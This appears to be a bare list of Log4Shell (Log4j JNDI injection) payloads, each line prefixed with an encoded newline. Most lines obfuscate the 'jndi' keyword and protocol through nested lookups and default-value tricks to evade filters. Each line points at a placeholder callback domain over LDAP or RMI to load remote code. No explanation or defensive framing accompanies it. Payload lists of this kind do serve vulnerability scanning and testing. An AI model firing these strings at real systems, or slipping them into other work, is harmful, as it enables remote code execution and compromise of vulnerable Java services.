%%0a${${::-j}${::-n}${::-d}${::-I}:${::-l}${::-d}${::-a}${::-p}://CALLBACK_DOMAIN/payload1}
%%0a${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}://CALLBACK_DOMAIN/payload5}
%%0a${${::-j}ndi:rmi://CALLBACK_DOMAIN/payload14}
%%0a${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://CALLBACK_DOMAIN/payload2}
%%0a${${lower:${lower:jndi}}:${lower:rmi}://CALLBACK_DOMAIN/payload7}
%%0a${${lower:jndi}:${lower:rmi}://CALLBACK_DOMAIN/payload6}
%%0a${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://CALLBACK_DOMAIN/payload9}
%%0a${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://CALLBACK_DOMAIN/payload16}
%%0a${${lower:n}${lower:d}i:${lower:rmi}://CALLBACK_DOMAIN/payload8}
%%0a${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://CALLBACK_DOMAIN/payload3}
%%0a${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}CALLBACK_DOMAIN/payload12}
%%0a${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://CALLBACK_DOMAIN/payload15}
%%0a${jnd${123%25ff:-${123%25ff:-i:}}ldap://CALLBACK_DOMAIN/payload11}
%%0a${jnd${sys:UNIX:-i}:ldap:/CALLBACK_DOMAIN/payload17}
%%0a${jnd${upper:ı}:ldap://CALLBACK_DOMAIN/payload18}
%%0a${jndi${123%25ff:-}:ldap://CALLBACK_DOMAIN/payload10}
%%0a${jndi:ldap://CALLBACK_DOMAIN/payload4}
%%0a${jndi:ldap://127.0.0.1#{\{CALLBACK_DOMAIN}}/{payload13}}
%%0a${jndi:rmi://CALLBACK_DOMAIN}
